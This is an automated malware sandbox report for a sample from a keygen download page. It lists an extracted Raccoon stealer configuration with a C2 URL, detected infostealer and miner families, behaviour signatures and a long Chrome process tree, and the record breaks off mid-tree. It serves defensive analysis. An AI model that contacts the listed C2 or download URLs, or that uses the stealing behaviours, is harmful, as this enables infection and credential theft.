Analysis

  • max time kernel
    1797s
  • max time network
    1797s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    19-04-2021 12:53

General

  • Target

    https://keygenit.com/d/879505fab610o2194510.html

  • Sample

    210419-ftya1gkrwn

Malware Config

Extracted

Family

raccoon

Botnet

562d987fd49ccf22372ac71a85515b4d288facd7

Attributes
  • url4cnc

    https://telete.in/j90dadarobin

rc4.plain
rc4.plain

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Pony,Fareit

    Pony is a Remote Access Trojan application that steals information.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 30 IoCs
  • Loads dropped DLL 7 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops Chrome extension 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 7 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies data under HKEY_USERS 14 IoCs
  • Modifies registry class 17 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 55 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 17 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:1008
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2592
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
      • Modifies registry class
      PID:2568
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2488
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
        1⤵
          PID:2340
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2304
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1868
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1436
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1348
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1256
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1088
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                        PID:948
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" https://keygenit.com/d/879505fab610o2194510.html
                        1⤵
                        • Enumerates system info in registry
                        • Modifies registry class
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of WriteProcessMemory
                        PID:1824
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ffc1b424f50,0x7ffc1b424f60,0x7ffc1b424f70
                          2⤵
                            PID:3192
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1512 /prefetch:2
                            2⤵
                              PID:2620
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1812 /prefetch:8
                              2⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:2664
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2152 /prefetch:8
                              2⤵
                                PID:2248
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2784 /prefetch:1
                                2⤵
                                  PID:3388
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2792 /prefetch:1
                                  2⤵
                                    PID:3500
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1
                                    2⤵
                                      PID:760
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
                                      2⤵
                                        PID:3860
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2148 /prefetch:1
                                        2⤵
                                          PID:412
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3476 /prefetch:1
                                          2⤵
                                            PID:4116
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4892 /prefetch:8
                                            2⤵
                                              PID:4524
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5664 /prefetch:8
                                              2⤵
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:4752
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6084 /prefetch:8
                                              2⤵
                                                PID:4836
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6300 /prefetch:8
                                                2⤵
                                                  PID:4864
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6256 /prefetch:8
                                                  2⤵
                                                    PID:4932
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6456 /prefetch:8
                                                    2⤵
                                                      PID:4968
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6152 /prefetch:8
                                                      2⤵
                                                        PID:5000
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6588 /prefetch:8
                                                        2⤵
                                                          PID:5040
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6840 /prefetch:8
                                                          2⤵
                                                            PID:5076
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6844 /prefetch:8
                                                            2⤵
                                                              PID:5088
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5060 /prefetch:8
                                                              2⤵
                                                                PID:4124
                                                              • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                                                                2⤵
                                                                  PID:4156
                                                                  • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                    "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff7bc75a890,0x7ff7bc75a8a0,0x7ff7bc75a8b0
                                                                    3⤵
                                                                      PID:4260
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6232 /prefetch:8
                                                                    2⤵
                                                                      PID:4484
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6580 /prefetch:8
                                                                      2⤵
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:4540
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6224 /prefetch:8
                                                                      2⤵
                                                                        PID:4536
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6808 /prefetch:8
                                                                        2⤵
                                                                          PID:4584
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6800 /prefetch:8
                                                                          2⤵
                                                                            PID:3324
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6268 /prefetch:8
                                                                            2⤵
                                                                              PID:3896
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6596 /prefetch:8
                                                                              2⤵
                                                                                PID:4676
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6816 /prefetch:8
                                                                                2⤵
                                                                                  PID:4664
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6780 /prefetch:8
                                                                                  2⤵
                                                                                    PID:1200
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6592 /prefetch:8
                                                                                    2⤵
                                                                                      PID:4784
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7176 /prefetch:8
                                                                                      2⤵
                                                                                        PID:4892
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6704 /prefetch:8
                                                                                        2⤵
                                                                                          PID:4980
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6756 /prefetch:8
                                                                                          2⤵
                                                                                            PID:4888
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6728 /prefetch:8
                                                                                            2⤵
                                                                                              PID:4864
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6720 /prefetch:8
                                                                                              2⤵
                                                                                                PID:5012
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6168 /prefetch:8
                                                                                                2⤵
                                                                                                  PID:5096
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6316 /prefetch:8
                                                                                                  2⤵
                                                                                                    PID:4336
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6736 /prefetch:8
                                                                                                    2⤵
                                                                                                      PID:4224
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6416 /prefetch:8
                                                                                                      2⤵
                                                                                                        PID:4496
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7944 /prefetch:8
                                                                                                        2⤵
                                                                                                          PID:3796
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6452 /prefetch:8
                                                                                                          2⤵
                                                                                                            PID:4728
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6700 /prefetch:8
                                                                                                            2⤵
                                                                                                              PID:4480
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7356 /prefetch:8
                                                                                                              2⤵
                                                                                                                PID:5028
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8040 /prefetch:8
                                                                                                                2⤵
                                                                                                                  PID:4112
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8172 /prefetch:8
                                                                                                                  2⤵
                                                                                                                    PID:1296
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6712 /prefetch:8
                                                                                                                    2⤵
                                                                                                                      PID:4948
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7332 /prefetch:8
                                                                                                                      2⤵
                                                                                                                        PID:4100
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8184 /prefetch:8
                                                                                                                        2⤵
                                                                                                                          PID:1624
                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7352 /prefetch:8
                                                                                                                          2⤵
                                                                                                                            PID:1972
                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7344 /prefetch:1
                                                                                                                            2⤵
                                                                                                                              PID:4536
                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7172 /prefetch:1
                                                                                                                              2⤵
                                                                                                                                PID:4784
                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5724 /prefetch:8
                                                                                                                                2⤵
                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                PID:4780
                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8188 /prefetch:1
                                                                                                                                2⤵
                                                                                                                                  PID:4368
                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6148 /prefetch:8
                                                                                                                                  2⤵
                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                  PID:5068
                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6752 /prefetch:8
                                                                                                                                  2⤵
                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                  PID:4952
                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1936 /prefetch:8
                                                                                                                                  2⤵
                                                                                                                                    PID:4676
                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7512 /prefetch:8
                                                                                                                                    2⤵
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    PID:4132
                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1492,3057561055611379846,6268315842496443645,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=936 /prefetch:8
                                                                                                                                    2⤵
                                                                                                                                      PID:4300
                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
